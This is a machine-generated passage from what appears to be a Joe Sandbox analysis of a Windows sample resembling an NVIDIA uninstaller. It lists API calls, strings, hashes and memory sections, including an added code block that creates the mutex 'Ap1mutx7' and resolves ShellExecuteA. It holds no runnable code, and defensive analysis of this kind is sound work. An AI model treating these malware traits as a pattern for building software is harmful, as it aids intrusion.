                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: _sprintf$MutexObjectReleaseSingleTimeWait_fputs$DebugFormatLocalOutputString_fprintf
                                  • String ID: Clearing uninstall component title from registry$Component uninstalled$Current Reg Name$Delreg {NVCompList_RegKey}\%s$Executing command %s$Getreg Uninstall Title={NVCompList_RegKey}\%s$Removing uninstall component title from registry$RunOnce {sysdir}\%s$Setreg {NVCompList_RegKey}\{Current Reg Name}={UNINSTALL_TAG}$Uninstall {sysdir}\%s,{Uninstall Title}$Uninstalling component %s
                                  • API String ID: 1613415582-2277294574
                                  • Opcode ID: 68a7d2de12f80199d49320735d0b63897df41a32a7ccac08fffaec95443d8dee
                                  • Instruction ID: c6f617dc216f05a48fa0ba580e3fb22fe50b4373394c1d2a431079b53d0eccfa
                                  • Opcode Fuzzy Hash: 68a7d2de12f80199d49320735d0b63897df41a32a7ccac08fffaec95443d8dee
                                  • Instruction Fuzzy Hash: 8521D3B5A44200B6C120B7A29C52FEF769D9FA1708F44453FB988621C2FA7C654983EF
                                  APIs
                                  Strings
                                  • NvRemoveString: invalid number of arguments!, xrefs: 004047FD
                                  • NvRemoveString: invalid number of arguments!, xrefs: 004047F3
                                  • NvRemoveString: Seperating string not found ("-"), xrefs: 004046A3
                                  • (-), xrefs: 00404690
                                  • NvRemoveString: Original string is missing!, xrefs: 00404700
                                  • NvRemoveString: Seperating string not found!, xrefs: 004046AD
                                  • NULL, xrefs: 00404656
                                  • NvRemoveString: Original string is missing! (nCpyLen=%d), xrefs: 004046F6
                                  • NvRemoveString: Both the original and removal string are the same!, xrefs: 00404771
                                  • UninstCommandClass::NvRemoveString(%s), xrefs: 0040465C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: _memset
                                  • String ID: (-)$NULL$NvRemoveString: Both the original and removal string are the same!$NvRemoveString: Original string is missing!$NvRemoveString: Original string is missing! (nCpyLen=%d)$NvRemoveString: Seperating string not found ("-")$NvRemoveString: Seperating string not found!$NvRemoveString: invalid number of arguments!$NvRemoveString: invalid number of arguments!$UninstCommandClass::NvRemoveString(%s)
                                  • API String ID: 2102423945-3212761688
                                  • Opcode ID: f347cdfc1e6805acec5583669ea69c1633b23ddf6944060d8fc4f639ffd391a7
                                  • Instruction ID: 30d08693506db3ec00ee17d6b6c93bb3bde48163a97bdcea72654f498ab7bc7e
                                  • Opcode Fuzzy Hash: f347cdfc1e6805acec5583669ea69c1633b23ddf6944060d8fc4f639ffd391a7
                                  • Instruction Fuzzy Hash: F9513A7264430057C210BF399C52BAB779D9FD2708F14493FF946B72C2EA7D990882AE
                                  APIs
                                  • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,0042B2C0,004139FD,0042B2C0,Microsoft Visual C++ Runtime Library,00012010), ref: 0041A44F
                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0041A46B
                                    • Part of subcall function 0040ED01: TlsGetValue.KERNEL32(00000000,0040ED76,00000000,0041A430,00000000,00000000,00000314,?,?,?,0042B2C0,004139FD,0042B2C0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040ED0E
                                    • Part of subcall function 0040ED01: TlsGetValue.KERNEL32(00000006,?,?,?,0042B2C0,004139FD,0042B2C0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040ED25
                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041A488
                                    • Part of subcall function 0040ED01: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0042B2C0,004139FD,0042B2C0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040ED3A
                                    • Part of subcall function 0040ED01: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040ED55
                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041A49D
                                  • __invoke_watson.LIBCMT ref: 0041A4BE
                                    • Part of subcall function 0040F338: _memset.LIBCMT ref: 0040F3C4
                                    • Part of subcall function 0040F338: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 0040F3E2
                                    • Part of subcall function 0040F338: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 0040F3EC
                                    • Part of subcall function 0040F338: UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0040F3F6
                                    • Part of subcall function 0040F338: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 0040F411
                                    • Part of subcall function 0040F338: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 0040F418
                                    • Part of subcall function 0040ED78: TlsGetValue.KERNEL32(00000000,0040EE0D,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040ED85
                                    • Part of subcall function 0040ED78: TlsGetValue.KERNEL32(00000006,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040ED9C
                                    • Part of subcall function 0040ED78: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040EDB1
                                    • Part of subcall function 0040ED78: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040EDCC
                                  • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0041A4D2
                                  • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0041A4EA
                                  • __invoke_watson.LIBCMT ref: 0041A55D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                                  • String ID: GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                  • API String ID: 2940365033-1046234306
                                  • Opcode ID: 9a5412f819f3c6c220af884810bdabe01b2ab99d1a25e3feb164289698fc1059
                                  • Instruction ID: 42f2fc5e58c2a1c02fc318937c309734d675263f87d4be835cb98964fc3c32e4
                                  • Opcode Fuzzy Hash: 9a5412f819f3c6c220af884810bdabe01b2ab99d1a25e3feb164289698fc1059
                                  • Instruction Fuzzy Hash: EE41E872D06315BEDF21AFB69C859AF7BA6EF44304B94093FE400E2140DB7C95948B5E
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SetFileAttributesA.KERNEL32(?,00000080,?,?), ref: 00408B1C
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 00408B38
                                  • GetCurrentThreadId.KERNEL32 ref: 00408B42
                                  • GetCurrentProcessId.KERNEL32(00000000), ref: 00408B49
                                  • _sprintf.LIBCMT ref: 00408B64
                                  • _sprintf.LIBCMT ref: 00408B94
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 00408BA3
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 00408BBA
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • NvCopyFile: invalid number of arguments, xrefs: 00408ABF
                                  • %s\%s, xrefs: 00408B8E
                                  • UninstCommandClass::NvCopyFileVerCheck, xrefs: 00408A9D
                                  • %c:\NV%d%d.TMP, xrefs: 00408B5E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: File_sprintf$CopyCurrentTime_fputs$AttributesCreateDebugDirectoryFormatLocalMutexObjectOutputProcessReleaseSingleStringThreadWait_fprintf
                                  • String ID: %c:\NV%d%d.TMP$%s\%s$NvCopyFile: invalid number of arguments$UninstCommandClass::NvCopyFileVerCheck
                                  • API String ID: 2568154830-690563461
                                  • Opcode ID: 20c95fc38083d052249822bca42f6b0be08be824ba3e80b0112c502072a75f56
                                  • Instruction ID: 880ecb89309b56fdde9e9b2a18346d4b9387fd29177224c26b984ed91fdb3e54
                                  • Opcode Fuzzy Hash: 20c95fc38083d052249822bca42f6b0be08be824ba3e80b0112c502072a75f56
                                  • Instruction Fuzzy Hash: 4A3188F6600700ABD224E7658D55FEB73A99F98700F00492EB796A72C1DE78E405C7A9
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\LisectAVT_2403002B_38.exe,000001FE,75550000,LoadLibraryA), ref: 0047C2DD
                                  • LoadLibraryA.KERNELBASE(SHELL32.DLL), ref: 0047C2F8
                                  • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 0047C306
                                  • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0047C333
                                  • GetLastError.KERNEL32(00000000), ref: 0047C33A
                                  • Sleep.KERNEL32(000927C0), ref: 0047C349
                                  • ExitProcess.KERNEL32(00000000), ref: 0047C351
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: AddressCreateErrorExitFileLastLibraryLoadModuleMutexNameProcProcessSleep
                                  • String ID: Ap1mutx7$C:\Users\user\Desktop\LisectAVT_2403002B_38.exe$SHELL32.DLL$ShellExecuteA$open
                                  • API String ID: 1721171764-1628270251
                                  • Opcode ID: 6c104a0f6e62e68dee18ecc3bd055f43f38d5ef494515f981eb1106d6201b215
                                  • Instruction ID: b6538c3db6ab6f8f24c4974401cf30b671cc78b6316f560e3626dbd79c8d7e65
                                  • Opcode Fuzzy Hash: 6c104a0f6e62e68dee18ecc3bd055f43f38d5ef494515f981eb1106d6201b215
                                  • Instruction Fuzzy Hash: 4B11D2312442496AEF10DEA08D4DFEA365C9F44B05F048419FE09EE1E0DAB59704876F
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                    • Part of subcall function 0040B97F: __mbsstr_l.LIBCMT ref: 0040B989
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?), ref: 00405D2B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOpenOutputReleaseSingleStringWait__mbsstr_l_fprintf
                                  • String ID: %s\%s$%s\%s\%s$UninstCommandClass::NvEnumKeys$\$\{*
                                  • API String ID: 1480039975-2666356572
                                  • Opcode ID: 0d01d8f83e1a2188cec3db82c679319051114f034373fdac95e3a596b26bc318
                                  • Instruction ID: b6ad12d341861cce78118837af77ae308dbf8b480cd39bf16652fddade545e61
                                  • Opcode Fuzzy Hash: 0d01d8f83e1a2188cec3db82c679319051114f034373fdac95e3a596b26bc318
                                  • Instruction Fuzzy Hash: 337180716083419FD310DB64CC85FABB7E8EF89304F14492EF989A7281E778E904CB96
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 0040C02B: __vsprintf_l.LIBCMT ref: 0040C039
                                  • OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 0040C3E9: __fsopen.LIBCMT ref: 0040C3F3
                                  • GetLocalTime.KERNEL32(?), ref: 00403EF3
                                  • GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                  • _fprintf.LIBCMT ref: 00403F35
                                  • _fputs.LIBCMT ref: 00403F56
                                  • _fputs.LIBCMT ref: 00403F75
                                  • ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait__fsopen__vsprintf_l_fprintf
                                  • String ID: $%s - %s(%d) - $hh':'mm':'ss tt
                                  • API String ID: 1162515530-124859373
                                  • Opcode ID: 3780f2a0d93e358a6c29f8f2988d7a435293a3d9557ded2ec510d2843d4a4b53
                                  • Instruction ID: 278b2e53d12784d2c02260523d4ec11e9ba5653ffe50f22f347f222bb60f5bbe
                                  • Opcode Fuzzy Hash: 3780f2a0d93e358a6c29f8f2988d7a435293a3d9557ded2ec510d2843d4a4b53
                                  • Instruction Fuzzy Hash: F631F8B2600201EBC320DB54DC86EEB776CFB88704F44863EB515961D1E7789546CBAE
                                  APIs
                                  • GetFileAttributesA.KERNEL32(?), ref: 0040A7B2
                                  • RemoveDirectoryA.KERNEL32(?), ref: 0040A7BE
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$AttributesDebugDirectoryFileFormatLocalMutexObjectOutputReleaseRemoveSingleStringWait_fprintf
                                  • String ID: Directory deleted$Failure deleting directory$File [%s] deleted$File [%s] queued for delete at reboot$NULL$UninstCommandClass::NvDeleteFile(%s)
                                  • API String ID: 2197460971-4186244654
                                  • Opcode ID: a3adb2b2094c677d35bc9ef3785804157e39864c874141277bf615064de83aa0
                                  • Instruction ID: 313d36747d0dabf9f21de1c353cd5bb380562bf5db678d566fd203420dcc2aac
                                  • Opcode Fuzzy Hash: a3adb2b2094c677d35bc9ef3785804157e39864c874141277bf615064de83aa0
                                  • Instruction Fuzzy Hash: AF11E3B264021027C2107A29BC02FDF66488FA1324F04803BF804F62C2D6BC9D9781EF
                                  APIs
                                  • GetModuleHandleA.KERNEL32(KERNEL32.DLL,004232D8,0000000C,0040EF6F,00000000,00000000,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040EE6F
                                  • GetProcAddress.KERNEL32(0040B4E2,EncodePointer), ref: 0040EEA3
                                  • GetProcAddress.KERNEL32(0040B4E2,DecodePointer), ref: 0040EEB3
                                  • InterlockedIncrement.KERNEL32(004253E8), ref: 0040EED5
                                  • __lock.LIBCMT ref: 0040EEDD
                                  • ___addlocaleref.LIBCMT ref: 0040EEFC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                  • String ID: DecodePointer$EncodePointer$KERNEL32.DLL$p`B$SB
                                  • API String ID: 1036688887-3353757658
                                  • Opcode ID: 0e13ec3f6d335226b1ca22a06e0cdc50d66b7e994675582999a593141d4a9725
                                  • Instruction ID: 987111c9388a5b1d51fb8aa43ea66616588b75e93f66127e2b923ad2a27a1228
                                  • Opcode Fuzzy Hash: 0e13ec3f6d335226b1ca22a06e0cdc50d66b7e994675582999a593141d4a9725
                                  • Instruction Fuzzy Hash: A11182B0A40705EED7209F76D805B9ABBE0EF44314F50496FE8A6A62E1CB789940CF59
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • CoInitialize.OLE32(00000000), ref: 00408480
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • UninstCommandClass::CheckRAID - Failed to initialize COM, xrefs: 0040848A
                                  • CheckRAID: invalid number of arguments, xrefs: 00408468
                                  • NVRAID_ARRAY_DEVICE, xrefs: 004084C4
                                  • TRUE, xrefs: 0040851C
                                  • UninstCommandClass::CheckRAID, xrefs: 00408442
                                  • RAID is enabled, xrefs: 00408509
                                  • FALSE, xrefs: 004084A5
                                  • RAID not enabled (failed to get array device enumerator), xrefs: 004084DE
                                  • RAID not enabled (failed to connect to ROOT\WMI), xrefs: 004084BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
